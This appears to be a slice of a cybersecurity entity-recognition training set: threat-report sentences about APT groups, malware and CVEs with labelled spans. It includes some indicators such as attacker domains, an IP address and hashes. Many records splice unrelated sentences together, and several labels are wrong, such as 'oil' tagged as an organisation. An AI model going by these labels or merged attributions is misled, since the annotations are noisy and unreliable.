"cyberner_stix_train"}} {"text": "The only noticeable difference is the game has more ads , including ads on the very first screen . Over the years they've used application components from Norman , McAfee and Norton . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China based APT group that we refer to as APT16 . 
For those who fall outside of that demographic , it ’s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": {"ORGANIZATION: Norman": [[155, 161]], "ORGANIZATION: McAfee": [[164, 170]], "ORGANIZATION: Norton": [[175, 181]], "THREAT_ACTOR: APT16": [[363, 368]], "TOOL: Microsoft": [[517, 526]]}, "info": {"id": "cyberner_stix_train_003137", "source": "cyberner_stix_train"}} {"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Moafee may have chosen its targets based on the rich resources of South China Sea region – the world 's second business sea-lane , according to Wikipedia – including rare earth metals , crude oil , and natural gas .", "spans": {"TOOL: Word": [[184, 188]], "VULNERABILITY: CVE-2015-2545": [[299, 312]], "THREAT_ACTOR: attacker": [[346, 354]], "THREAT_ACTOR: Moafee": [[428, 434]], "ORGANIZATION: oil": [[620, 623]], "ORGANIZATION: gas": [[638, 641]]}, "info": {"id": "cyberner_stix_train_003138", "source": "cyberner_stix_train"}} {"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . 
The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": {"MALWARE: Riltok": [[77, 83]], "ORGANIZATION: FireEye": [[130, 137]], "THREAT_ACTOR: APT28": [[163, 168]]}, "info": {"id": "cyberner_stix_train_003139", "source": "cyberner_stix_train"}} {"text": "The data sent to the C2 follows a structured pattern that uses a predefined keywords array , where each keyword is mapped to a certain subroutine .", "spans": {"TOOL: C2": [[21, 23]]}, "info": {"id": "cyberner_stix_train_003140", "source": "cyberner_stix_train"}} {"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States . This collaborative approach allowed the team to observe the malware and its victims . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": {"MALWARE: Zen": [[4, 7]], "TOOL: VPS": [[206, 209]], "ORGANIZATION: CrySyS Lab": [[355, 365]], "THREAT_ACTOR: unknown threat actor": [[466, 486]]}, "info": {"id": "cyberner_stix_train_003141", "source": "cyberner_stix_train"}} {"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East . JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 . 
NIST does not necessarily endorse the views expressed , or concur with the facts presented on these sites .", "spans": {"THREAT_ACTOR: OilRig": [[110, 116]], "MALWARE: JhoneRAT": [[219, 227]], "FILEPATH: 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4": [[230, 294]], "ORGANIZATION: NIST": [[297, 301]]}, "info": {"id": "cyberner_stix_train_003142", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . It will ask for a password to run command as root .", "spans": {"MALWARE: them": [[22, 26]]}, "info": {"id": "cyberner_stix_train_003143", "source": "cyberner_stix_train"}} {"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": {"MALWARE: implant": [[187, 194]], "THREAT_ACTOR: Gamaredon": [[199, 208]], "MALWARE: Emissary": [[301, 309]]}, "info": {"id": "cyberner_stix_train_003144", "source": "cyberner_stix_train"}} {"text": "The malware can be configured to use multiple network protocols to avoid network-based detection .", "spans": {}, "info": {"id": "cyberner_stix_train_003145", "source": "cyberner_stix_train"}} {"text": "We have associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . 
Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"THREAT_ACTOR: APT19": [[38, 43]], "ORGANIZATION: Chinese": [[137, 144]], "ORGANIZATION: government": [[145, 155]], "ORGANIZATION: Iranians": [[225, 233]]}, "info": {"id": "cyberner_stix_train_003146", "source": "cyberner_stix_train"}} {"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser . In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": {"ORGANIZATION: Unit 42": [[134, 141]], "THREAT_ACTOR: cybercriminals": [[242, 256]], "THREAT_ACTOR: OilRig group": [[355, 367]], "MALWARE: credential harvesting": [[378, 399]], "MALWARE: compromised accounts": [[404, 424]], "ORGANIZATION: government agency": [[436, 453]]}, "info": {"id": "cyberner_stix_train_003147", "source": "cyberner_stix_train"}} {"text": "The link directs them to a malicious web page , which prompts them to download an Android application package ( APK ) . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date . 
Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": {"MALWARE: sample": [[166, 172]], "THREAT_ACTOR: Gamaredon": [[379, 388]]}, "info": {"id": "cyberner_stix_train_003148", "source": "cyberner_stix_train"}} {"text": "Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware , supporting infrastructure , online personas , victimology , and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "MALWARE: Winnti": [[41, 47]], "ORGANIZATION: Microsoft intelligent security graph": [[199, 235]]}, "info": {"id": "cyberner_stix_train_003149", "source": "cyberner_stix_train"}} {"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": {"TOOL: NetTraveler": [[24, 35]], "VULNERABILITY: CVE-2012-0158": [[57, 70]], "TOOL: NetTraveler Trojan": [[82, 100]], "THREAT_ACTOR: Advanced Persistent": [[155, 174]], "THREAT_ACTOR: Threat ( APT ) 40": [[175, 192]], "THREAT_ACTOR: Periscope": [[207, 216]]}, "info": {"id": "cyberner_stix_train_003150", "source": "cyberner_stix_train"}} {"text": "Victims were recorded in the UK , Poland , Russia and China .", "spans": {}, "info": {"id": "cyberner_stix_train_003151", "source": "cyberner_stix_train"}} {"text": "The success is largely the result of the malware 's ability to silently root a large percentage of the phones it infects by exploiting vulnerabilities that remain unfixed in older versions of Android . It 's possible that Lazarus is using RATANKBA to target larger organizations . APT33 : 5.187.21.70 microsoftupdated.com . 
On the left , the stolen credit card data is sent via a WebSocket skimmer while on the right , it is a POST request : In the past months there have been several Magecart skimmers abusing Google Tag Manager in one way or another .", "spans": {"VULNERABILITY: vulnerabilities that remain unfixed in older versions of Android": [[135, 199]], "THREAT_ACTOR: Lazarus": [[222, 229]], "TOOL: RATANKBA": [[239, 247]], "THREAT_ACTOR: APT33": [[281, 286]], "IP_ADDRESS: 5.187.21.70": [[289, 300]], "DOMAIN: microsoftupdated.com": [[301, 321]], "MALWARE: Magecart skimmers": [[485, 502]], "TOOL: Google Tag Manager": [[511, 529]]}, "info": {"id": "cyberner_stix_train_003152", "source": "cyberner_stix_train"}} {"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller . \" Machete \" is a targeted attack campaign with Spanish speaking roots . APT1 is believed to be the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 . 
The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": {"THREAT_ACTOR: APT1": [[255, 259]], "ORGANIZATION: Bureau of the People ’s Liberation Army": [[286, 325]], "ORGANIZATION: PLA": [[328, 331]], "ORGANIZATION: General Staff Department": [[334, 358]], "ORGANIZATION: GSD": [[364, 367]], "ORGANIZATION: Military Unit Cover Designator": [[423, 453]], "ORGANIZATION: MUCD": [[456, 460]], "ORGANIZATION: Unit 61398": [[466, 476]]}, "info": {"id": "cyberner_stix_train_003153", "source": "cyberner_stix_train"}} {"text": "All of that is to say , the decoy documents leveraged in this campaign would likely be relevant and of interest to a variety of targets in Israel and Palestine , consistent with previously identified KASPERAGENT targeting patterns .", "spans": {"MALWARE: KASPERAGENT": [[200, 211]]}, "info": {"id": "cyberner_stix_train_003154", "source": "cyberner_stix_train"}} {"text": "The same wrapper has also been used to wrap legitimate executable files , which were then made available for users to download from torrent sites .", "spans": {}, "info": {"id": "cyberner_stix_train_003155", "source": "cyberner_stix_train"}} {"text": "The samples date from April – May 2017 , coinciding with the run up to the May 2017 Palestinian Authority elections .", "spans": {"ORGANIZATION: Palestinian Authority": [[84, 105]]}, "info": {"id": "cyberner_stix_train_003156", "source": "cyberner_stix_train"}} {"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign . 
Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": {"SYSTEM: Dalvik": [[57, 63]], "SYSTEM: ART": [[68, 71]], "TOOL: FrozenCell masquerades": [[95, 117]], "ORGANIZATION: Facebook": [[160, 168]], "ORGANIZATION: WhatsApp": [[171, 179]], "ORGANIZATION: Messenger": [[182, 191]], "ORGANIZATION: LINE": [[194, 198]], "ORGANIZATION: LoveChat": [[205, 213]], "MALWARE: RAT": [[275, 278]], "ORGANIZATION: CrySyS Lab": [[407, 417]], "THREAT_ACTOR: unknown threat actor": [[518, 538]]}, "info": {"id": "cyberner_stix_train_003157", "source": "cyberner_stix_train"}} {"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a “ kill switch ” that can eliminate the malware remotely from an infected device . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": {"THREAT_ACTOR: actor": [[179, 184]], "VULNERABILITY: CVE-2018–8440": [[205, 218]], "VULNERABILITY: vulnerability": [[247, 260]], "VULNERABILITY: proof-of-concept": [[383, 399]], "VULNERABILITY: exploit": [[400, 407]], "ORGANIZATION: Unit 42": [[432, 439]], "THREAT_ACTOR: OilRig": [[453, 459]], "ORGANIZATION: insurance agency": [[499, 515]]}, "info": {"id": "cyberner_stix_train_003158", "source": "cyberner_stix_train"}} {"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty . Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . 
Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: OceanLotus": [[60, 70]], "THREAT_ACTOR: APT32": [[87, 92]], "THREAT_ACTOR: Cobalt Kitty": [[95, 107]], "THREAT_ACTOR: Winnti": [[110, 116]], "ORGANIZATION: charts of companies": [[180, 199]], "ORGANIZATION: individual business units": [[252, 277]], "THREAT_ACTOR: Hackers": [[315, 322]]}, "info": {"id": "cyberner_stix_train_003159", "source": "cyberner_stix_train"}} {"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": {"TOOL: Truvasys": [[15, 23]], "ORGANIZATION: Microsoft": [[26, 35]], "TOOL: Myntor": [[98, 104]], "MALWARE: Potao": [[188, 193]]}, "info": {"id": "cyberner_stix_train_003160", "source": "cyberner_stix_train"}} {"text": "Winexe acts as a Windows service that can be configured to automatically start at boot and silently wait for incoming commands over a named pipe .", "spans": {"TOOL: Winexe": [[0, 6]], "SYSTEM: Windows": [[17, 24]]}, "info": {"id": "cyberner_stix_train_003161", "source": "cyberner_stix_train"}} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]], "FILEPATH: Filensfer": [[147, 156]]}, "info": {"id": "cyberner_stix_train_003162", "source": "cyberner_stix_train"}} {"text": "Content observers : use Android 's ContentObserver framework to gather changes in SMS , Calendar , Contacts , Cell info , Email , WhatsApp , Facebook , Twitter , Kakao , Viber , and Skype . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy . Winnti : dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php . As we 've discussed recently , there has been huge growth in the ransomware and extortion space , potentially linked to the plethora of leaked builders and source code related to various ransomware cartels .", "spans": {"SYSTEM: Android": [[24, 31]], "SYSTEM: SMS": [[82, 85]], "SYSTEM: Calendar": [[88, 96]], "SYSTEM: Contacts": [[99, 107]], "SYSTEM: Cell info": [[110, 119]], "SYSTEM: Email": [[122, 127]], "SYSTEM: WhatsApp": [[130, 138]], "SYSTEM: Facebook": [[141, 149]], "SYSTEM: Twitter": [[152, 159]], "SYSTEM: Kakao": [[162, 167]], "SYSTEM: Viber": [[170, 175]], "SYSTEM: Skype": [[182, 187]], "THREAT_ACTOR: Leviathan": [[194, 203]], "ORGANIZATION: universities": [[276, 288]], "ORGANIZATION: military": [[294, 302]], "ORGANIZATION: Navy": [[346, 350]], "THREAT_ACTOR: Winnti": [[353, 359]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[391, 449]]}, "info": {"id": "cyberner_stix_train_003163", "source": "cyberner_stix_train"}} {"text": "] 923525 [ . 
APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . However the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"THREAT_ACTOR: APT28": [[13, 18]], "VULNERABILITY: EternalBlue exploit": [[59, 78]], "TOOL: open source tool": [[87, 103]], "TOOL: Responder": [[104, 113]], "VULNERABILITY: server - side request forgery ( SSRF": [[408, 444]]}, "info": {"id": "cyberner_stix_train_003164", "source": "cyberner_stix_train"}} {"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]], "THREAT_ACTOR: Wild Neutron": [[206, 218]], "MALWARE: stolen code signing certificate": [[245, 276]], "ORGANIZATION: electronics": [[300, 311]], "TOOL: Flash Player": [[338, 350]], "VULNERABILITY: exploit": [[351, 358]]}, "info": {"id": "cyberner_stix_train_003165", "source": "cyberner_stix_train"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: Bemstour": [[174, 182]], "ORGANIZATION: Symantec": [[191, 199]], "VULNERABILITY: zero-day": [[273, 281]], "ORGANIZATION: Microsoft": [[311, 320]]}, "info": {"id": "cyberner_stix_train_003166", "source": "cyberner_stix_train"}} {"text": "At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files , so they may be introducing their malicious code into these files before compiling someone else ’s project .", "spans": {}, "info": {"id": "cyberner_stix_train_003167", "source": "cyberner_stix_train"}} {"text": "Fortunately for us , the C2 servers for several of these documents were still operational allowing for retrieval of the malicious macro and the subsequent payloads .", "spans": {"TOOL: C2": [[25, 27]], "TOOL: malicious macro": [[120, 135]]}, "info": {"id": "cyberner_stix_train_003168", "source": "cyberner_stix_train"}} {"text": "CVE-2015-1701 does not affect Windows 8 and later .", "spans": {"VULNERABILITY: CVE-2015-1701": [[0, 13]], "SYSTEM: Windows 8": [[30, 39]]}, "info": {"id": "cyberner_stix_train_003169", "source": "cyberner_stix_train"}} {"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims . While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered “ loud. 
” These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": {"THREAT_ACTOR: TG-3390": [[229, 236]], "TOOL: HTTPBrowser backdoor": [[250, 270]], "TOOL: command and control": [[546, 565]], "ORGANIZATION: Cisco Talos": [[583, 594]], "ORGANIZATION: U.S. Department of Health and Human Services ( HHS )": [[644, 696]], "MALWARE: Rhysida ransomware": [[735, 753]]}, "info": {"id": "cyberner_stix_train_003170", "source": "cyberner_stix_train"}} {"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . The adversary crafted credible email and attachment after understanding the targets and their behavior .", "spans": {"SYSTEM: Adobe Flash Player": [[0, 18]], "MALWARE: Ginp": [[170, 174]], "THREAT_ACTOR: APT10": [[262, 267]], "ORGANIZATION: Visma": [[296, 301]], "TOOL: Citrix remote desktop": [[342, 363]], "TOOL: email": [[484, 489]]}, "info": {"id": "cyberner_stix_train_003171", "source": "cyberner_stix_train"}} {"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea . 
idc.load_and_run_plugin Additionally , 20 said they had experienced data breaches by former employees .", "spans": {"THREAT_ACTOR: Honeybee": [[172, 180]]}, "info": {"id": "cyberner_stix_train_003172", "source": "cyberner_stix_train"}} {"text": "This write-up will survey notables in the past year of 2017 Sofacy activity , including their targeting , technology , and notes on their infrastructure .", "spans": {"THREAT_ACTOR: Sofacy": [[60, 66]]}, "info": {"id": "cyberner_stix_train_003173", "source": "cyberner_stix_train"}} {"text": "'' This is a trojan with many built-in capabilities . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"ORGANIZATION: CERT 360": [[154, 162]], "THREAT_ACTOR: BITTER APT": [[184, 194]], "THREAT_ACTOR: APT33": [[218, 223]], "TOOL: emails": [[244, 250]], "ORGANIZATION: employees": [[254, 263]], "ORGANIZATION: aviation industry": [[290, 307]]}, "info": {"id": "cyberner_stix_train_003174", "source": "cyberner_stix_train"}} {"text": "] it Catania server2cz.exodus.connexxa [ . XENOTIME is easily the most dangerous threat activity publicly known . computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . aname : the location of the malware on the infected machine . Initially , the group claimed DDoS attacks against entities located in Western countries , seemingly prioritizing Sweden , the Netherlands , and Denmark .", "spans": {"THREAT_ACTOR: XENOTIME": [[43, 51]], "TOOL: GUID": [[145, 149]], "THREAT_ACTOR: DDoS attacks": [[324, 336]]}, "info": {"id": "cyberner_stix_train_003175", "source": "cyberner_stix_train"}} {"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ . 
Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed .", "spans": {"MALWARE: HIGHNOON": [[74, 82]], "THREAT_ACTOR: Winnti": [[121, 127]], "ORGANIZATION: defense contractors": [[429, 448]]}, "info": {"id": "cyberner_stix_train_003176", "source": "cyberner_stix_train"}} {"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {"VULNERABILITY: CVE-2012-0773": [[124, 137]], "ORGANIZATION: social engineering": [[232, 250]], "ORGANIZATION: Microsoft": [[293, 302], [347, 356]], "SYSTEM: Windows": [[303, 310]], "MALWARE: remote administration tools": [[403, 430]], "MALWARE: RATs": [[433, 437]], "ORGANIZATION: oil and gas": [[562, 573]]}, "info": {"id": "cyberner_stix_train_003177", "source": "cyberner_stix_train"}} {"text": "From mid-2017 to mid-2018 , Whitefly launched targeted attacks against multiple organizations . 
However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": {"THREAT_ACTOR: Whitefly": [[28, 36]], "THREAT_ACTOR: Rocke": [[127, 132]], "VULNERABILITY: exploit": [[193, 200]], "VULNERABILITY: CVE-2018-1000861": [[201, 217]], "VULNERABILITY: CVE-2019-1003000": [[222, 238]]}, "info": {"id": "cyberner_stix_train_003178", "source": "cyberner_stix_train"}} {"text": "While it is not surprising that the Dukes reacted to multiple companies publishing extensive reports on one of their key toolsets , it is valuable to note the manner in which they responded .", "spans": {"THREAT_ACTOR: Dukes": [[36, 41]]}, "info": {"id": "cyberner_stix_train_003179", "source": "cyberner_stix_train"}} {"text": "TA505 is arguably one of the most significant financially motivated threat actors because of the extraordinary volumes of messages they send .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]]}, "info": {"id": "cyberner_stix_train_003180", "source": "cyberner_stix_train"}} {"text": "Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East . The DLL located in the Media registry key is a variant of the KHRAT Troja S-MALn E-MAL . 
None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"THREAT_ACTOR: MuddyWater": [[143, 153]], "TOOL: DLL": [[272, 275]], "TOOL: Media registry": [[291, 305]], "MALWARE: KHRAT": [[330, 335]], "MALWARE: Troja S-MALn E-MAL": [[336, 354]], "TOOL: Microsoft Exchange server": [[507, 532]]}, "info": {"id": "cyberner_stix_train_003181", "source": "cyberner_stix_train"}} {"text": "These could include resetting the user ’ s PIN , enabling or disabling various alerts and confirmations , and confirming the user ’ s identity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East . Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings . Monitor MSSQL Servers with access to OT systems and networks for evidence of : • Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": {"ORGANIZATION: Unit 42": [[173, 180]], "THREAT_ACTOR: OilRig group": [[214, 226]], "ORGANIZATION: government agency": [[257, 274]], "MALWARE: JhoneRAT": [[350, 358]]}, "info": {"id": "cyberner_stix_train_003182", "source": "cyberner_stix_train"}} {"text": "By analyzing running processes on the infected device , it shows that the malware creates a child process of itself to perform the multi-process ptrace anti-debugging technique . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . 
All contain the same Visual Basic macro code and author name as Honeybee .", "spans": {"THREAT_ACTOR: actors": [[229, 235]], "VULNERABILITY: CVE-2019-0604": [[245, 258]], "TOOL: China Chopper webshell": [[304, 326]], "THREAT_ACTOR: Honeybee": [[393, 401]]}, "info": {"id": "cyberner_stix_train_003183", "source": "cyberner_stix_train"}} {"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"THREAT_ACTOR: APT33": [[114, 119]], "TOOL: public and non-public tools": [[139, 166]], "TOOL: ALFA TEaM Shell": [[252, 267]], "TOOL: publicly available web shell": [[274, 302]], "ORGANIZATION: OT defenders": [[551, 563]], "ORGANIZATION: asset owners": [[568, 580]], "MALWARE: COSMICENERGY": [[620, 632]]}, "info": {"id": "cyberner_stix_train_003184", "source": "cyberner_stix_train"}} {"text": "Analysis into the two binaries shows that they are in fact a Delphi ( initially UPX packed ) and .NET version of the Zekapab first-stage malware .", "spans": {"TOOL: Delphi": [[61, 67]], "TOOL: UPX": [[80, 83]], "TOOL: .NET": [[97, 101]], "MALWARE: Zekapab": [[117, 124]]}, "info": {"id": "cyberner_stix_train_003185", "source": "cyberner_stix_train"}} {"text": "Also , the fact the initial macro uses this dropped document for the execution of the payload may also 
explain why the document did not contain any decoy contents .", "spans": {"TOOL: macro": [[28, 33]]}, "info": {"id": "cyberner_stix_train_003186", "source": "cyberner_stix_train"}} {"text": "These organizations included :", "spans": {}, "info": {"id": "cyberner_stix_train_003187", "source": "cyberner_stix_train"}} {"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[138, 141]], "THREAT_ACTOR: Threat Group-1314": [[195, 212]]}, "info": {"id": "cyberner_stix_train_003189", "source": "cyberner_stix_train"}} {"text": "The user agent string employed is “ MSIE 8.0 ” .", "spans": {"TOOL: MSIE": [[36, 40]]}, "info": {"id": "cyberner_stix_train_003190", "source": "cyberner_stix_train"}} {"text": "After performing a fraudulent action , stealing the OTP/mTAN , TrickMo buys some time by activating the lock screen and preventing the user from accessing their device . The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . 
Lua modules is a technique that has previously been used by Flamer .", "spans": {"MALWARE: TrickMo": [[63, 70]], "TOOL: BokBot malware": [[174, 188]], "MALWARE: Lua modules": [[365, 376]]}, "info": {"id": "cyberner_stix_train_003191", "source": "cyberner_stix_train"}} {"text": "However , because dnc.org email accounts were targeted in the same way as hillaryclinton.com accounts , it is likely that dnc.org did use Gmail at that time and later moved to a different service .", "spans": {"DOMAIN: dnc.org": [[18, 25], [122, 129]], "TOOL: email": [[26, 31]], "DOMAIN: hillaryclinton.com": [[74, 92]], "TOOL: Gmail": [[138, 143]]}, "info": {"id": "cyberner_stix_train_003192", "source": "cyberner_stix_train"}} {"text": "The Dukes appear to prioritize the continuation of their operations over stealth .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_003193", "source": "cyberner_stix_train"}} {"text": "Notably , this operation marked the first time Lazarus had targeted macOS users , with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of trust among potential victims .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]], "SYSTEM: macOS": [[68, 73]]}, "info": {"id": "cyberner_stix_train_003194", "source": "cyberner_stix_train"}} {"text": "Execute commands on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_003195", "source": "cyberner_stix_train"}} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
